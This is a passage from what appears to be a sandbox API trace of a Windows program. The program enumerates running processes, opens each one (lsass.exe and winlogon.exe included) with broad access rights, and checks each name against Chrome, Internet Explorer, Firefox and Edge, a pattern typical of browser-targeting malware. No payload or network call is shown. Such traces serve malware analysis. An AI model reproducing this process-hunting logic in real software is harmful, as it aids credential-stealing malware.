	[0200.099] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0200.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1afc
	[0200.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.100] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0200.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.100] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.101] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0200.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.101] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1b00
	[0200.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.102] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.103] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.103] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.103] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.104] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0200.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1b04
	[0200.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.105] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0200.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.105] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.106] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0200.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.106] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.106] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0200.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1b08
	[0200.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.107] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0200.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.107] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.108] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0200.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.108] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.108] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0200.109] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1b0c
	[0200.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.109] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0200.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.109] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.110] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0200.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.110] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.110] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0200.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1b10
	[0200.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.111] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.111] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.111] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.112] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.112] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1b14
	[0200.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.113] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.113] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.114] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.114] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.114] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1b18
	[0200.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.115] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.116] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.116] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.116] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.117] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1b1c
	[0200.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.118] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.118] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.119] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.119] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.119] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1b20
	[0200.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.120] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.120] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.121] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.121] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.121] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1b24
	[0200.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.122] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.122] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.123] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.123] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.123] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1b28
	[0200.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.124] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.124] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.125] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.125] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.125] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1b2c
	[0200.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.126] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.126] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.127] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.127] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.127] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0200.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1b30
	[0200.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.128] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0200.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.128] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.129] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0200.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.129] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.129] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1b34
	[0200.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.130] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.130] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.131] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.131] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0200.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1b38
	[0200.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.132] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.132] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.133] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.133] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.133] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1b3c
	[0200.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.134] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.135] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.135] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.135] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1b40
	[0200.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.136] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.136] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.137] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.137] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0200.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1b44
	[0200.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.138] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0200.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.138] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.139] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0200.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.139] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.139] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0200.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1b48
	[0200.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.140] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0200.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.141] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.141] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0200.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.141] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.141] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0200.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1b4c
	[0200.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.142] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.142] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.143] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.143] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0200.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1b50
	[0200.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.144] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0200.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.144] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.145] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0200.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.145] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0200.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0200.146] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0200.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1b54
	[0200.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.147] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0200.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.147] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.148] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0200.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.149] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.150] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0200.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1b58
	[0200.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.151] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0200.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.151] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.151] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0200.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.152] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.152] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0200.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1b5c
	[0200.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.153] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
